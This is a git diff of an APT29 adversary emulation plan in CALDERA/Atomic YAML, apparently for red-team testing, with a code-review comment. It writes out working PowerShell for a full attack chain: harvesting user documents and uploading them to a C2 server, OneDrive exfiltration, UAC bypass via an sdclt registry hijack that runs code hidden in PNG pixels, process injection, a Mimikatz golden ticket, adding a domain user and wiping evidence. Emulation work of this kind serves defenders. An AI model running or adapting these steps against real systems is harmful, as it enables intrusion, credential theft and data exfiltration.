Error, MITRE-ATTACK-EVALS.HTML was not found."; + exit 1; + } + Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; + . .\stepSeventeen_zip.ps1; + zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; + if ($?) { + write-host "[+] Documents successfully staged for collection."; + } + + payloads: + - stepSeventeen_zip.ps1 + + input_arguments: + profile_user_day2: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + try{ + if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { + New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; + } + } catch { + write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; + exit 1; + } + + if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { + write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; + exit 1; + } + Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; + . .\stepSeventeen_zip.ps1; + zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; + if ($?) 
{ + write-host "[+] Documents successfully staged for collection."; + } + +# Step 18 - Exfiltration + +- id: 4840d6dd-da13-401a-be46-05db56f4e1e0 + name: Exfiltrate data to OneDrive + description: Transfer data to a OneDrive account + tactic: exfiltration + technique: + attack_id: T1537 + name: "Transfer Data to Cloud Account" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "18.A" + platforms: + windows: + psh,pwsh: + command: | + $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); + if($err -Like "*System error 85*") { + Write-Host "OneDrive net drive is already mounted!"; + } elseif($err -Like "*System error 67*") { + Write-Host "OneDrive net drive mount failed - Check URL!"; + Write-Host "#{onedrive.url}"; + exit 1; + } elseif($err -Like "*System error 1244*") { + Write-Host "Could not authenticate to OneDrive - Check Creds!"; + Write-Host "User: #{onedrive.username}"; + Write-Host "Password: #{onedrive.password}"; + exit 1; + } + + Write-Host "Mount Successful" + Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; + if(!$?){ + exit 1; + } + + Write-Host "Copy Successfull" + exit 0; + + input_arguments: + onedrive.url: + description: URL for OneDrive net drive + type: URL + default: https://contoso-my.sharepoint.com/personal/johnd_contoso_onmicrosoft_com/ + + onedrive.username: + description: Username for OneDrive authentication + type: string + default: Administrator + + onedrive.password: + description: Password for OneDrive authentication + type: string + default: Password123! 
+ + executors: + - name: powershell + command: | + $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); + if($err -Like "*System error 85*") { + Write-Host "OneDrive net drive is already mounted!"; + } elseif($err -Like "*System error 67*") { + Write-Host "OneDrive net drive mount failed - Check URL!"; + Write-Host "#{onedrive.url}"; + exit 1; + } elseif($err -Like "*System error 1244*") { + Write-Host "Could not authenticate to OneDrive - Check Creds!"; + Write-Host "User: #{onedrive.username}"; + Write-Host "Password: #{onedrive.password}"; + exit 1; + } + + Write-Host "Mount Successful" + Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; + if(!$?){ + exit 1; + } + + Write-Host "Copy Successfull" + exit 0; + +# Step 19 - Cleanup + +- id: f820b93d-6176-4a72-a138-a70b0b549c49 + name: Data Wiping of staged files + description: Securely delete previously staged files. + tactic: impact + technique: + attack_id: T1561.001 + name: "Disk Wipe: Disk Content Wipe" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_impact + procedure_step: "19.A-19.C" + platforms: + windows: + psh,pwsh: + command: | + . .\wipe.ps1; + wipe "m.exe"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; + payloads: + - wipe.ps1 + + executors: + - name: powershell + command: | + . .\wipe.ps1; + wipe "m.exe"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; + +# Step 20 - Leverage Persistence +# 20.A and 20.B were switched in original adversary profile. 
+- id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a + name: Execute Invoke-Mimikatz + description: Perfofrm Mimikatz credential collection + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "20.B" + platforms: + windows: + psh,pwsh: + command: | + klist purge; + . .\Invoke-Mimikatz.ps1; + invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; + klist; + invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; + payloads: + - Invoke-Mimikatz.ps1 + + input_arguments: + target.domain.name: + description: Target domain name + type: string + default: domain + + target.sid: + description: SID for target user + type: string + default: S-1-5-21-1004336348-1177238915-682003330-512 + + target.ntlm: + description: NTLM hash for target user + type: string + default: 855c3697d9979e78ac404c4ba2c66533 + + target.winrm.username: + description: Username for winrm target user + type: string + default: Administrator + + executors: + - name: powershell + command: | + klist purge; + . 
.\Invoke-Mimikatz.ps1; + invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; + klist; + invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; + +- id: afb8d8f7-d059-4825-95ae-c5727e2db320 + name: Triggering Persistent + description: Trigger RegKey persistence by rebooting the machine + tactic: persistence + technique: + attack_id: T1218.011 + name: "Signed Binary Proxy Execution: Rundll32" + cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" + procedure_group: procedure_persistence + procedure_step: "20.A" + platforms: + windows: + psh,pwsh: + command: | + Restart-Computer -Force; + + executors: + - name: powershell + command: | + Restart-Computer -Force; diff --git a/apt29/Emulation_Plan/yaml/APT29.yaml b/apt29/Emulation_Plan/yaml/APT29.yaml deleted file mode 100644 index 7f23eb7d..00000000 --- a/apt29/Emulation_Plan/yaml/APT29.yaml +++ /dev/null 
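Review bot: Step 18.A prints the live OneDrive credential to the agent's output on an authentication failure (`Write-Host "Password: #{onedrive.password}"` in both the `psh,pwsh` and `executors` copies), which lands the password in the C2 results and in any operation log or report exported from them; the username line is enough to debug the mount, so I'd delete the password `Write-Host` and keep only `Write-Host "User: #{onedrive.username}"`. Related, step 16.C-16.D copies `m.exe` into `C:\Windows\System32\` on the domain controller over the WinRM session, but the step 19 wipe only runs `wipe "m.exe"` on the local host, so a Mimikatz binary is left in System32 on the DC after the plan completes — a remote removal in 19.A-19.C (re-establish the session via `invoke-winrmsession` and run `Remove-Item C:\Windows\System32\m.exe -Force` through it) would close that gap. Minor: in 20.B the pivot target `scranton` is hard-coded while every other remote host in this file is an input argument (`#{target.winrm.remote_host}`), and the 15.A guard `findstr /i "__Filter"` over `Get-WmiObject -Namespace "root/subscription" -list` output may match built-in class names such as `__FilterToConsumerBinding` rather than an existing subscription, which would make the step always report "already executed" — worth checking on the range and, if so, querying `-Class __EventFilter` instances instead.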
@@ -1,2809 +0,0 @@ -# APT29.yaml - CALDERA and Atomic style TTPs - -- emulation_plan_details: - id: 4975696e-1d41-11eb-adc1-0242ac120002 - adversary_name: APT29 - adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. - attack_version: 8.1 - format_version: 1.0 - -# Scenario 1 - -# Step 1 - Initial Breach - -- id: 571845f6-b75c-4b9d-a666-a78f7827261f - name: RTLO Start Sandcat - description: Perform RTLO technique with SANDCAT - tactic: execution - technique: - attack_id: T1036.002 - name: "Masquerading: Right-to-Left Override" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163405/CosmicDuke.pdf" - procedure_group: procedure_execution - procedure_step: "1.A" - platforms: - windows: - psh,pwsh: - command: | - Sleep 3; - $bin = Get-ChildItem *cod*scr*; - $arguments = '-server "#{server}" -group "rtlo_group"'; - start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; - - if ($?) { - write-host "Successfully completed RTLO execution. A new agent should appear"; - exit 0; - - } else { - write-host "Failure of RTLO execution."; - exit 1; - } - payloads: - - cod.3aka3.scr - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Sleep 3; - $bin = Get-ChildItem *cod*scr*; - $arguments = '-server "#{server}" -group "rtlo_group"'; - start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; - - if ($?) { - write-host "Successfully completed RTLO execution. 
A new agent should appear"; - exit 0; - - } else { - write-host "Failure of RTLO execution."; - exit 1; - } - -- id: a5daa530-c640-49bc-aa54-6808789a684a - name: PowerShell - description: Spawn powershell.exe from cmd.exe - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_execution - procedure_step: "1.B" - platforms: - windows: - cmd: - command: | - powershell.exe; - if ($?) { - write-host "[*] PowerShell successfully spawned"; - exit 0; - } - - executors: - - name: command_prompt - command: | - powershell.exe; - if ($?) { - write-host "[*] PowerShell successfully spawned"; - exit 0; - } - -# Step 2 - Rapid Collection and Exfiltration - -- id: 5692da31-3586-4e4f-8f07-5750070c730b - name: Automated Collection - description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. - tactic: collection - technique: - attack_id: T1119 - name: "Automated Collection" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "2.A.1" - platforms: - windows: - psh,pwsh: - command: | - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force - - executors: - - name: powershell - command: | - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include 
*.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force - -- id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 - name: System Network Configuration Discovery - description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.A.2" - platforms: - windows: - cmd: - command: | - ipconfig /all - - executors: - - name: command_prompt - command: | - ipconfig /all - -- id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce - name: System Network Configuration Discovery - description: The arp utility is executed via cmd to enumerate local ARP configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.A.3" - platforms: - windows: - cmd: - command: | - arp -a - - executors: - - name: command_prompt - command: | - arp -a - -- id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd - name: System Owner / User Discovery - description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain. 
- tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.B.1" - platforms: - windows: - cmd: - command: | - echo %USERDOMAIN%\%USERNAME% - - executors: - - name: command_prompt - command: | - echo %USERDOMAIN%\%USERNAME% - -- id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 - name: Data from staged fileand Exfiltration over C2 Channel - description: Copy a target file from a remote file share through the existing C2 channel - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over Command and Control Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "2.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; - -- id: 5df12481-9d8c-4235-b550-9cefc8ed7361 - name: Process Discovery - description: API call(s) are executed to enumerate local running processes. 
- tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.C.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\ps.ps1 -Verbose -Force; - ProcessList - payloads: - - ps.ps1 - - executors: - - name: powershell - command: | - Import-Module .\ps.ps1 -Verbose -Force; - ProcessList - -- id: 41610306-087c-4c34-874b-37b8ed633a36 - name: Process Discovery - description: The tasklist utility is executed via cmd to enumerate local running processes. - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.C.2" - platforms: - windows: - cmd: - command: | - tasklist /v - - executors: - - name: command_prompt - command: | - tasklist /v - -- id: 2ff877b4-0c00-401e-9d3f-070c70b610df - name: System Service Discovery - description: The sc utility is executed via cmd to enumerate local active services. - tactic: discovery - technique: - attack_id: T1007 - name: "System Service Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.D.1" - platforms: - windows: - cmd: - command: | - sc query - - executors: - - name: command_prompt - command: | - sc query - -- id: 144b1384-5060-494f-80eb-91772695cdf3 - name: System Service Discovery - description: The net utility is executed via cmd to enumerate local active services. 
- tactic: discovery - technique: - attack_id: T1007 - name: "System Service Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.D.2" - platforms: - windows: - cmd: - command: | - net start - - executors: - - name: command_prompt - command: | - net start - -- id: d2ea2676-7f85-4228-b980-ab3c0e1adc03 - name: System Information Discovery - description: The systeminfo utility is executed via cmd to enumerate local operating system configuration. - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.E.1" - platforms: - windows: - cmd: - command: | - systeminfo - - executors: - - name: command_prompt - command: | - systeminfo - -- id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6 - name: System Information Discovery - description: The net utility is executed via cmd to enumerate local operating system configuration. - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.E.2" - platforms: - windows: - cmd: - command: | - net config workstation - - executors: - - name: command_prompt - command: | - net config workstation - -- id: faa96e7f-081a-40b7-a743-a6a7f2627ea3 - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the local system's administrators group. 
- tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.1" - platforms: - windows: - cmd: - command: | - net localgroup administrators - - executors: - - name: command_prompt - command: | - net localgroup administrators - -- id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group. - tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.2" - platforms: - windows: - cmd: - command: | - net localgroup administrators /domain - - executors: - - name: command_prompt - command: | - net localgroup administrators /domain - -- id: 84377d7a-0363-44fd-a082-44657ca1858f - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the domain administrators group. - tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.3" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Admins" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Admins" /domain - -- id: 61221fb9-cb32-46d5-98fd-90567a621526 - name: Account Discovery - description: The net utility is executed via cmd to enumerate domain user accounts. 
- tactic: discovery - technique: - attack_id: T1087 - name: "Account Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.G.1" - platforms: - windows: - cmd: - command: | - net user /domain - - executors: - - name: command_prompt - command: | - net user /domain - -- id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 - name: Account Discovery - description: The net utility is executed via cmd to enumerate detailed information about a specific user account. - tactic: discovery - technique: - attack_id: T1087 - name: "Account Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.G.2" - platforms: - windows: - cmd: - command: | - net user %USERNAME% /domain - - executors: - - name: command_prompt - command: | - net user %USERNAME% /domain - -- id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a - name: Query Registry - description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions. 
- tactic: discovery - technique: - attack_id: T1012 - name: "Query Registry" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.H.1" - platforms: - windows: - cmd: - command: | - reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - - executors: - - name: command_prompt - command: | - reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - -# Step 3 - Deploy Stealth Toolkit -- id: 68b588bc-002a-42dc-bac7-9189f944065b - name: Staging monkey PNG - description: Staging PNG for Lateral Movement - tactic: defensive-evasion - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "3.A.1" - platforms: - windows: - psh,pwsh: - command: | - $username="#{profile_user}"; - if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { - copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; - if ($? -eq $True) { - write-host "[+] Successfully copied monkey.png!"; - get-childitem -path "C:\Users\$username\Downloads\\"; - exit 0; - } else { - write-host "[+] Failed to copy monkey.png."; - exit 1; - } - - } else { - write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." - } - payloads: - - monkey.png - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - $username="#{profile_user}"; - if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { - copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; - if ($? 
-eq $True) { - write-host "[+] Successfully copied monkey.png!"; - get-childitem -path "C:\Users\$username\Downloads\\"; - exit 0; - } else { - write-host "[+] Failed to copy monkey.png."; - exit 1; - } - -- id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0 - name: Bypass User Account Control - description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality. - tactic: privilege-escalation - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.A.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose - payloads: - - update.ps1 - - Invoke-BypassUACTokenManipulation.ps1 - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose - -- id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b - name: UAC Bypass via Backup Utility - description: Modify registry values of sdclt to bypass UAC - tactic: privilege-escalation - technique: - attack_id: T1548.002 - 
name: "Abuse Elevation Control Mechanism: Bypass User Account Control" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.A.3" - platforms: - windows: - psh,pwsh: - command: | - if (!(test-path -path $env:windir\system32\sdclt.exe)) { - write-host "[!] sdclt.exe was not found on this host."; - exit 1; - } - New-Item -Path HKCU:\Software\Classes -Name Folder -Force; - New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; - - $username="#{profile_user}"; - $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; - - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; - - cmd.exe /c sdclt.exe; - cmd.exe /c powershell.exe; - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - if (!(test-path -path $env:windir\system32\sdclt.exe)) { - write-host "[!] 
sdclt.exe was not found on this host."; - exit 1; - } - New-Item -Path HKCU:\Software\Classes -Name Folder -Force; - New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; - - $username="#{profile_user}"; - $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; - - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; - - cmd.exe /c sdclt.exe; - cmd.exe /c powershell.exe; - -- id: 5ff80022-8d85-410b-b868-6c7565b267e5 - name: Registry Cleanup for UAC Bypass Technique - description: Delete registry entries post-UAC bypass. 
- tactic: defensive-evasion - technique: - attack_id: T1112 - name: "Modify Registry" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "3.B" - platforms: - windows: - psh,pwsh: - command: | - Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; - if (!(test-path -path HKCU:\Software\Classes\Folder)) { - write-host "[+] Reg keys removed!"; - } - - executors: - - name: powershell - command: | - Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; - if (!(test-path -path HKCU:\Software\Classes\Folder)) { - write-host "[+] Reg keys removed!"; - } - -- id: 088b8639-3f37-42cc-9dc8-01aabb645461 - name: Process Injection - description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT. - tactic: privilege-escalation - technique: - attack_id: T1055 - name: "Process Injection" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.C" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Inject -PoshCode $pcode; - payloads: - - update.ps1 - - Invoke-PSInject.ps1 - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module 
$env:APPDATA\update.ps1;update('#{server}')")); - Inject -PoshCode $pcode; - -# Step 4 - Defense Evasion and Discovery - -- id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d - name: Planting Modified Sysinternals Utilities - description: Uploading payloads masquerading as via modified SysInternalsSuite - tactic: stage-capabilities - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "N/A" - procedure_group: procedure_staging - procedure_step: "4.A.1" - platforms: - windows: - psh,pwsh: - command: | - iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; - Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error moving files to #{profile_user}\Downloads"; - exit 1; - } - - Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; - Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; - - if (! $?) 
